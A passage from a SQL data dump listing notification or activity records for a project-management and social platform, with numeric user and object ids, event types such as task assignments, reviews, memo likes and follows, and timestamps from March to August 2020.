14:13:32','Project',NULL),(1067,77,107,255,'ReporterJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-03-19 15:13:11','2020-03-19 15:13:11','System',NULL),(1068,76,107,255,'ReporterJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-03-19 15:13:11','2020-03-19 15:13:11','System',NULL),(1069,77,106,255,'ReporterJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-03-19 15:15:15','2020-03-19 15:15:15','System',NULL),(1070,76,106,255,'ReporterJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-03-19 15:15:15','2020-03-19 15:15:15','System',NULL),(1071,77,109,255,'ReporterJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-03-19 15:15:17','2020-03-19 15:15:17','System',NULL),(1072,76,109,255,'ReporterJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-03-19 15:15:17','2020-03-19 15:15:17','System',NULL),(1073,77,105,255,'JoinProject',NULL,NULL,255,'Project',1,NULL,'2020-03-19 15:15:56','2020-03-19 15:15:56','Apply','4'),(1074,76,105,255,'JoinProject',NULL,NULL,255,'Project',1,NULL,'2020-03-19 15:15:56','2020-03-19 15:15:56','Apply','4'),(1075,77,108,255,'ReporterJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-03-19 15:17:18','2020-03-19 15:17:18','System',NULL),(1076,76,108,255,'ReporterJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-03-19 15:17:18','2020-03-19 15:17:18','System',NULL),(1077,105,76,255,'DealProject',NULL,NULL,255,'Project',1,NULL,'2020-03-19 15:23:57','2020-03-19 15:23:57','System','4'),(1078,63,1,266,'ManagerJoinProject',NULL,NULL,266,'Project',NULL,NULL,'2020-03-19 15:51:49','2020-03-19 15:51:49','System','5'),(1079,49,1,94,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-23 08:33:14','2020-03-23 08:33:14','System','8'),(1080,49,1,69,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-23 08:35:48','2020-03-23 08:35:48','System','8'),(1081,49,1,91,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-23 08:36:48','2020-03-23 08:36:48','System','8'),(1082,49,1,95,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 08:56:09','2020-03-23 08:56:09','Task','5'),(1083,49,1,96,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 08:57:37','2020-03-23 08:57:37','Task','5'),(1084,49,1,97,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 08:58:30','2020-03-23 08:58:30','Task','5'),(1085,49,1,98,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:09:47','2020-03-23 09:09:47','Task','5'),(1086,49,1,27,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:11:24','2020-03-23 09:11:24','Project','5'),(1087,49,1,27,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:11:24','2020-03-23 09:11:24','Project','5'),(1088,49,1,99,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:13:44','2020-03-23 09:13:44','Task','5'),(1089,49,1,100,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:15:27','2020-03-23 09:15:27','Task','6'),(1090,49,1,101,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:15:33','2020-03-23 09:15:33','Task','6'),(1091,49,1,101,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:16:16','2020-03-23 09:16:16','Project','6'),(1092,49,1,101,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:16:16','2020-03-23 09:16:16','Project','6'),(1093,49,1,119,'Review',NULL,NULL,NULL,NULL,1,0,'2020-03-23 09:17:45','2020-03-23 09:17:45','Review','26'),(1094,49,1,102,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:18:03','2020-03-23 09:18:03','Task','6'),(1095,49,1,102,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:23:34','2020-03-23 09:23:34','Project','6'),(1096,49,1,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:25:43','2020-03-23 09:25:43','Task','6'),(1097,49,1,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:27:28','2020-03-23 09:27:28','Project','6'),(1098,49,1,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:27:39','2020-03-23 09:27:39','Project','6'),(1099,49,1,120,'Review',NULL,NULL,NULL,NULL,1,0,'2020-03-23 09:31:40','2020-03-23 09:31:40','Review','26'),(1100,49,1,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:32:23','2020-03-23 09:32:23','Project','6'),(1101,49,1,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:41:05','2020-03-23 09:41:05','Project','6'),(1102,49,1,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 09:44:21','2020-03-23 09:44:21','Project','6'),(1103,1,49,100,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 10:29:51','2020-03-23 10:29:51','Project','2'),(1104,49,1,100,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-23 10:39:02','2020-03-23 10:39:02','System','11'),(1105,63,1,100,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-23 10:39:02','2020-03-23 10:39:02','System','11'),(1106,49,1,92,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-23 10:41:43','2020-03-23 10:41:43','System','11'),(1107,64,1,92,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-23 10:41:43','2020-03-23 10:41:43','System','11'),(1108,49,1,100,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-23 10:42:18','2020-03-23 10:42:18','System','10'),(1109,63,1,134,'Paper',NULL,NULL,100,'Task',1,0,'2020-03-23 10:42:18','2020-03-23 10:42:18','System','12'),(1110,49,1,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 11:18:50','2020-03-23 11:18:50','Project','6'),(1111,49,1,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 11:19:20','2020-03-23 11:19:20','Project','6'),(1112,49,1,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 14:43:45','2020-03-23 14:43:45','Project','6'),(1113,49,1,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 14:43:45','2020-03-23 14:43:45','Project','6'),(1114,49,1,89,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 14:46:29','2020-03-23 14:46:29','Project','6'),(1115,49,1,89,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 14:46:29','2020-03-23 14:46:29','Project','6'),(1116,49,46,126,'Review',NULL,NULL,NULL,NULL,1,0,'2020-03-23 14:47:04','2020-03-23 14:47:04','Review','26'),(1117,49,46,127,'Review',NULL,NULL,NULL,NULL,1,0,'2020-03-23 14:49:39','2020-03-23 14:49:39','Review','26'),(1118,1,46,139,'Paper',NULL,NULL,95,'Task',1,0,'2020-03-23 15:10:39','2020-03-23 15:10:39','Comment','1'),(1119,1,65,140,'Paper',NULL,NULL,95,'Task',1,0,'2020-03-23 15:15:49','2020-03-23 15:15:49','Comment','1'),(1120,1,65,141,'Paper',NULL,NULL,95,'Task',1,0,'2020-03-23 15:25:33','2020-03-23 15:25:33','Comment','1'),(1121,49,1,104,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-23 17:16:10','2020-03-23 17:16:10','Task','5'),(1122,49,1,105,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-24 08:22:34','2020-03-24 08:22:34','Task','5'),(1123,1,1,142,'Paper',NULL,NULL,105,'Task',1,0,'2020-03-24 08:23:27','2020-03-24 08:23:27','Comment','1'),(1124,1,73,143,'Paper',NULL,NULL,105,'Task',1,0,'2020-03-24 08:24:17','2020-03-24 08:24:17','Comment','1'),(1125,1,1,142,'Paper',NULL,NULL,105,'Task',0,NULL,'2020-03-24 08:25:40','2020-03-24 08:25:40','System','5'),(1126,73,1,NULL,'Review',NULL,NULL,142,'Paper',0,NULL,'2020-03-24 08:25:40','2020-03-24 08:25:40','System','28'),(1127,63,1,134,'Paper',NULL,NULL,100,'Task',0,NULL,'2020-03-24 08:30:28','2020-03-24 08:30:28','System','5'),(1128,49,1,NULL,'Review',NULL,NULL,134,'Paper',0,NULL,'2020-03-24 08:30:28','2020-03-24 08:30:28','System','28'),(1129,73,1,143,'Paper',NULL,NULL,105,'Task',0,NULL,'2020-03-24 08:42:07','2020-03-24 08:42:07','System','5'),(1130,49,1,NULL,'Review',NULL,NULL,143,'Paper',0,NULL,'2020-03-24 08:42:07','2020-03-24 08:42:07','System','28'),(1131,49,1,106,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-24 08:48:37','2020-03-24 08:48:37','Task','6'),(1132,49,1,132,'Review',NULL,NULL,NULL,NULL,1,0,'2020-03-24 08:48:44','2020-03-24 08:48:44','Review','26'),(1133,49,1,107,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-24 08:49:56','2020-03-24 08:49:56','Task','5'),(1134,49,1,108,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-24 08:50:46','2020-03-24 08:50:46','Task','5'),(1135,1,73,146,'Paper',NULL,NULL,108,'Task',1,0,'2020-03-24 08:50:57','2020-03-24 08:50:57','Comment','1'),(1136,1,46,147,'Paper',NULL,NULL,96,'Task',1,0,'2020-03-24 08:55:29','2020-03-24 08:55:29','Comment','1'),(1137,1,63,148,'Paper',NULL,NULL,96,'Task',1,0,'2020-03-24 08:56:01','2020-03-24 08:56:01','Comment','1'),(1138,1,63,149,'Paper',NULL,NULL,95,'Task',1,0,'2020-03-24 08:57:03','2020-03-24 08:57:03','Comment','1'),(1139,1,63,150,'Paper',NULL,NULL,108,'Task',1,0,'2020-03-24 08:57:42','2020-03-24 08:57:42','Comment','1'),(1140,1,63,151,'Paper',NULL,NULL,99,'Task',1,0,'2020-03-24 08:58:53','2020-03-24 08:58:53','Comment','1'),(1141,1,46,152,'Paper',NULL,NULL,99,'Task',1,0,'2020-03-24 08:59:58','2020-03-24 08:59:58','Comment','1'),(1142,1,66,153,'Paper',NULL,NULL,99,'Task',1,0,'2020-03-24 09:01:05','2020-03-24 09:01:05','Comment','1'),(1143,1,66,160,'Paper',NULL,NULL,95,'Task',1,0,'2020-03-24 09:09:38','2020-03-24 09:09:38','Comment','1'),(1144,49,1,27,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-24 09:34:45','2020-03-24 09:34:45','System','9'),(1145,1,49,108,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-24 17:11:33','2020-03-24 17:11:33','Project','2'),(1146,1,1,161,'Paper',NULL,NULL,104,'Task',1,0,'2020-03-24 17:14:19','2020-03-24 17:14:19','Comment','1'),(1147,1,49,104,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-24 17:18:43','2020-03-24 17:18:43','Project','2'),(1148,1,1,161,'Paper',NULL,NULL,104,'Task',0,NULL,'2020-03-24 17:20:06','2020-03-24 17:20:06','System','5'),(1149,49,1,NULL,'Review',NULL,NULL,161,'Paper',0,NULL,'2020-03-24 17:20:06','2020-03-24 17:20:06','System','28'),(1150,1,49,105,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-25 09:18:52','2020-03-25 09:18:52','Project','2'),(1151,49,1,109,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-25 15:51:38','2020-03-25 15:51:38','Task','5'),(1152,49,1,110,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-25 15:52:03','2020-03-25 15:52:03','Task','5'),(1153,1,49,95,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-25 16:08:22','2020-03-25 16:08:22','Project','2'),(1154,1,49,96,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-25 16:16:10','2020-03-25 16:16:10','Project','2'),(1155,1,49,98,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-25 16:21:20','2020-03-25 16:21:20','Project','2'),(1156,1,46,99,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-25 16:34:05','2020-03-25 16:34:05','Project','2'),(1157,1,49,99,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-25 16:39:47','2020-03-25 16:39:47','Project','2'),(1158,1,49,99,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-25 16:42:14','2020-03-25 16:42:14','Project','2'),(1159,49,1,111,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-26 16:51:13','2020-03-26 16:51:13','Task','5'),(1160,49,1,96,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:28:58','2020-03-27 15:28:58','System','11'),(1161,63,1,96,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:28:58','2020-03-27 15:28:58','System','11'),(1162,49,1,98,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:29:17','2020-03-27 15:29:17','System','11'),(1163,46,1,98,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:29:17','2020-03-27 15:29:17','System','11'),(1164,49,1,99,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:29:33','2020-03-27 15:29:33','System','11'),(1165,63,1,99,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:29:33','2020-03-27 15:29:33','System','11'),(1166,66,1,99,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:29:33','2020-03-27 15:29:33','System','11'),(1167,49,1,98,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:30:50','2020-03-27 15:30:50','System','10'),(1168,46,1,159,'Paper',NULL,NULL,98,'Task',1,0,'2020-03-27 15:30:50','2020-03-27 15:30:50','System','12'),(1169,49,1,99,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:31:03','2020-03-27 15:31:03','System','10'),(1170,63,1,151,'Paper',NULL,NULL,99,'Task',1,0,'2020-03-27 15:31:03','2020-03-27 15:31:03','System','12'),(1171,66,1,153,'Paper',NULL,NULL,99,'Task',1,0,'2020-03-27 15:31:03','2020-03-27 15:31:03','System','12'),(1172,49,1,112,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-03-27 15:32:16','2020-03-27 15:32:16','Task','5'),(1173,49,1,89,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:34:19','2020-03-27 15:34:19','System','8'),(1174,1,1,163,'Paper',NULL,NULL,89,'Task',1,0,'2020-03-27 15:34:35','2020-03-27 15:34:35','Comment','1'),(1175,1,66,164,'Paper',NULL,NULL,89,'Task',1,0,'2020-03-27 15:35:25','2020-03-27 15:35:25','Comment','1'),(1176,49,1,108,'Task',NULL,NULL,NULL,NULL,1,0,'2020-03-27 15:52:08','2020-03-27 15:52:08','System','8'),(1177,1,1,274,'Project',NULL,NULL,NULL,NULL,0,0,'2020-03-27 19:19:54','2020-03-27 19:19:54','Project','1'),(1178,49,1,113,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-04-02 15:35:27','2020-04-02 15:35:27','Task','5'),(1179,1,49,103,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-04-02 15:36:08','2020-04-02 15:36:08','Project','2'),(1180,1,1,165,'Paper',NULL,NULL,113,'Task',1,0,'2020-04-02 15:45:16','2020-04-02 15:45:16','Comment','1'),(1181,45,1,142,'Review',NULL,NULL,NULL,NULL,1,0,'2020-04-03 09:30:35','2020-04-03 09:30:35','System','2'),(1182,49,1,103,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 10:17:35','2020-04-03 10:17:35','System','8'),(1183,46,1,2,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 10:56:37','2020-04-03 10:56:37','System','8'),(1184,49,1,96,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 10:58:22','2020-04-03 10:58:22','System','8'),(1185,49,1,104,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 10:59:26','2020-04-03 10:59:26','System','8'),(1186,49,1,103,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 11:14:12','2020-04-03 11:14:12','System','8'),(1187,49,1,103,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 11:21:03','2020-04-03 11:21:03','System','8'),(1188,49,1,103,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 11:22:47','2020-04-03 11:22:47','System','8'),(1189,49,1,103,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 11:25:21','2020-04-03 11:25:21','System','8'),(1190,49,1,103,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 11:49:37','2020-04-03 11:49:37','System','8'),(1191,49,1,103,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 11:57:39','2020-04-03 11:57:39','System','8'),(1192,49,1,97,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-03 13:38:35','2020-04-03 13:38:35','System','8'),(1193,49,1,113,'Task',NULL,NULL,NULL,NULL,1,0,'2020-04-07 09:02:03','2020-04-07 09:02:03','System','8'),(1194,49,1,114,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-04-09 09:03:55','2020-04-09 09:03:55','Task','5'),(1195,1,46,166,'Paper',NULL,NULL,114,'Task',1,0,'2020-04-09 09:10:13','2020-04-09 09:10:13','Comment','1'),(1196,1,66,167,'Paper',NULL,NULL,114,'Task',1,0,'2020-04-09 09:17:55','2020-04-09 09:17:55','Comment','1'),(1197,1,49,114,'Task',NULL,NULL,NULL,NULL,0,NULL,'2020-04-10 10:01:15','2020-04-10 10:01:15','Project','2'),(1198,1,1,275,'Project',NULL,NULL,NULL,NULL,0,0,'2020-05-13 09:17:41','2020-05-13 09:17:41','Project','1'),(1322,66,1,90,'Watcher',NULL,NULL,66,'User',NULL,0,'2020-08-10 14:40:43','2020-08-10 14:40:43','Fan',NULL),(1325,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:24:00','2020-08-10 16:24:00','PraiseTread',NULL),(1327,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:24:48','2020-08-10 16:24:48','PraiseTread',NULL),(1329,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:25:25','2020-08-10 16:25:25','PraiseTread',NULL),(1331,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:25:27','2020-08-10 16:25:27','PraiseTread',NULL),(1333,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:39:07','2020-08-10 16:39:07','PraiseTread',NULL),(1336,1,111,167,'Memo',167,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:47:39','2020-08-10 16:47:39','PraiseTread',NULL),(1338,1,111,167,'Memo',167,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:47:42','2020-08-10 16:47:42','PraiseTread',NULL),(1340,1,111,167,'Memo',167,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:48:02','2020-08-10 16:48:02','PraiseTread',NULL),(1342,1,111,167,'Memo',167,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:48:04','2020-08-10 16:48:04','PraiseTread',NULL),(1344,1,111,167,'Memo',167,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:48:06','2020-08-10 16:48:06','PraiseTread',NULL),(1346,1,111,167,'Memo',167,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:48:09','2020-08-10 16:48:09','PraiseTread',NULL),(1348,1,111,167,'Memo',167,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:48:14','2020-08-10 16:48:14','PraiseTread',NULL),(1350,1,111,167,'Memo',167,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:48:18','2020-08-10 16:48:18','PraiseTread',NULL),(1352,1,111,167,'Memo',167,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:48:21','2020-08-10 16:48:21','PraiseTread',NULL),(1354,1,111,167,'Memo',167,'Memo',NULL,NULL,NULL,0,'2020-08-10 16:49:35','2020-08-10 16:49:35','PraiseTread',NULL),(1356,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-10 17:33:18','2020-08-10 17:33:18','PraiseTread',NULL),(1358,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-10 17:33:20','2020-08-10 17:33:20','PraiseTread',NULL),(1389,1,111,123,'Memo',123,'Memo',NULL,NULL,NULL,0,'2020-08-10 18:07:25','2020-08-10 18:07:25','PraiseTread',NULL),(1391,1,111,143,'Memo',143,'Memo',NULL,NULL,NULL,0,'2020-08-10 18:18:02','2020-08-10 18:18:02','PraiseTread',NULL),(1393,1,111,143,'Memo',143,'Memo',NULL,NULL,NULL,0,'2020-08-10 18:18:40','2020-08-10 18:18:40','PraiseTread',NULL),(1394,1,111,NULL,'Memo',143,'Memo',NULL,NULL,NULL,0,'2020-08-10 18:19:09','2020-08-10 18:19:09','Memo',NULL),(1395,1,111,NULL,'Memo',143,'Memo',NULL,NULL,NULL,0,'2020-08-10 18:19:14','2020-08-10 18:19:14','Memo',NULL),(1396,1,111,NULL,'Memo',143,'Memo',NULL,NULL,NULL,0,'2020-08-10 18:19:16','2020-08-10 18:19:16','Memo',NULL),(1397,1,111,NULL,'Memo',143,'Memo',NULL,NULL,NULL,0,'2020-08-10 18:19:16','2020-08-10 18:19:16','Memo',NULL),(1398,1,111,NULL,'Memo',143,'Memo',NULL,NULL,NULL,0,'2020-08-10 18:19:17','2020-08-10 18:19:17','Memo',NULL),(1399,1,111,NULL,'Memo',143,'Memo',NULL,NULL,NULL,0,'2020-08-10 18:19:17','2020-08-10 18:19:17','Memo',NULL),(1486,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-11 09:31:11','2020-08-11 09:31:11','PraiseTread',NULL),(1529,46,111,115,'Watcher',NULL,NULL,46,'User',NULL,0,'2020-08-13 11:31:51','2020-08-13 11:31:51','Fan',NULL),(1530,73,0,317,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-13 15:31:41','2020-08-13 15:31:41','System','d_2'),(1532,46,66,116,'Watcher',NULL,NULL,46,'User',NULL,0,'2020-08-14 14:56:13','2020-08-14 14:56:13','Fan',NULL),(1536,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:20:48','2020-08-14 18:20:48','PraiseTread',NULL),(1538,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:21:13','2020-08-14 18:21:13','PraiseTread',NULL),(1540,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:26:38','2020-08-14 18:26:38','PraiseTread',NULL),(1542,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:26:43','2020-08-14 18:26:43','PraiseTread',NULL),(1544,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:27:00','2020-08-14 18:27:00','PraiseTread',NULL),(1546,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:27:01','2020-08-14 18:27:01','PraiseTread',NULL),(1548,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:27:01','2020-08-14 18:27:01','PraiseTread',NULL),(1550,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:27:09','2020-08-14 18:27:09','PraiseTread',NULL),(1552,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:30:57','2020-08-14 18:30:57','PraiseTread',NULL),(1554,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:33:05','2020-08-14 18:33:05','PraiseTread',NULL),(1556,1,111,177,'Memo',177,'Memo',NULL,NULL,NULL,0,'2020-08-14 18:41:08','2020-08-14 18:41:08','PraiseTread',NULL),(1564,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-17 14:16:26','2020-08-17 14:16:26','PraiseTread',NULL),(1568,1,112,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-17 16:27:15','2020-08-17 16:27:15','PraiseTread',NULL),(1569,1,112,124,'Watcher',NULL,NULL,1,'User',NULL,0,'2020-08-17 16:35:23','2020-08-17 16:35:23','Fan',NULL),(1571,19,111,176,'Memo',176,'Memo',NULL,NULL,NULL,0,'2020-08-17 16:52:40','2020-08-17 16:52:40','PraiseTread',NULL),(1575,1,111,180,'Memo',180,'Memo',NULL,NULL,NULL,0,'2020-08-17 17:08:12','2020-08-17 17:08:12','PraiseTread',NULL),(1577,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-17 17:48:40','2020-08-17 17:48:40','PraiseTread',NULL),(1579,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-17 17:50:27','2020-08-17 17:50:27','PraiseTread',NULL),(1580,1,111,256,'PraiseTread',183,'Memo',NULL,NULL,NULL,0,'2020-08-17 17:50:48','2020-08-17 17:50:48','Praise',NULL),(1581,1,111,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-17 17:50:48','2020-08-17 17:50:48','PraiseTread',NULL),(1583,19,111,176,'Memo',176,'Memo',NULL,NULL,NULL,0,'2020-08-17 17:53:51','2020-08-17 17:53:51','PraiseTread',NULL),(1586,1,114,337,'Memo',NULL,'',NULL,NULL,NULL,0,'2020-08-18 08:55:16','2020-08-18 08:55:16','Memo',NULL),(1587,114,114,258,'PraiseTread',337,'Memo',NULL,NULL,NULL,0,'2020-08-18 08:55:19','2020-08-18 08:55:19','Praise',NULL),(1588,114,114,337,'Memo',337,'Memo',NULL,NULL,NULL,0,'2020-08-18 08:55:19','2020-08-18 08:55:19','PraiseTread',NULL),(1589,114,1,337,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:56:29','2020-08-18 08:56:29','Comment','1'),(1590,50,1,241,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:56:51','2020-08-18 08:56:51','Comment','1'),(1591,50,1,240,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:56:52','2020-08-18 08:56:52','Comment','1'),(1592,50,1,239,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:56:52','2020-08-18 08:56:52','Comment','1'),(1593,50,1,236,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:56:53','2020-08-18 08:56:53','Comment','1'),(1594,50,1,235,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:56:54','2020-08-18 08:56:54','Comment','1'),(1595,50,1,234,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:56:54','2020-08-18 08:56:54','Comment','1'),(1596,50,1,233,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:56:55','2020-08-18 08:56:55','Comment','1'),(1597,50,1,232,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:56:56','2020-08-18 08:56:56','Comment','1'),(1598,50,1,230,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:56:57','2020-08-18 08:56:57','Comment','1'),(1599,114,1,259,'PraiseTread',337,'Memo',NULL,NULL,NULL,0,'2020-08-18 08:57:06','2020-08-18 08:57:06','Praise',NULL),(1600,114,1,337,'Memo',337,'Memo',NULL,NULL,NULL,0,'2020-08-18 08:57:06','2020-08-18 08:57:06','PraiseTread',NULL),(1602,50,1,241,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:58:43','2020-08-18 08:58:43','Comment','1'),(1603,50,1,241,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:58:43','2020-08-18 08:58:43','Comment','1'),(1604,50,1,241,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:58:43','2020-08-18 08:58:43','Comment','1'),(1605,50,1,241,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:58:43','2020-08-18 08:58:43','Comment','1'),(1606,50,1,241,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:58:43','2020-08-18 08:58:43','Comment','1'),(1607,50,1,241,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:58:43','2020-08-18 08:58:43','Comment','1'),(1608,50,1,241,'Memo',NULL,NULL,NULL,NULL,NULL,0,'2020-08-18 08:58:43','2020-08-18 08:58:43','Comment','1'),(1624,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:28:41','2020-08-18 18:28:41','PraiseTread',NULL),(1626,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:28:54','2020-08-18 18:28:54','PraiseTread',NULL),(1632,1,47,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:29:18','2020-08-18 18:29:18','PraiseTread',NULL),(1634,1,47,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:29:30','2020-08-18 18:29:30','PraiseTread',NULL),(1636,1,47,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:29:31','2020-08-18 18:29:31','PraiseTread',NULL),(1638,1,47,183,'Memo',183,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:29:32','2020-08-18 18:29:32','PraiseTread',NULL),(1640,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:38:42','2020-08-18 18:38:42','PraiseTread',NULL),(1642,50,47,240,'Memo',240,'Memo',NULL,NULL,NULL,0,'2020-08-18 18:44:18','2020-08-18 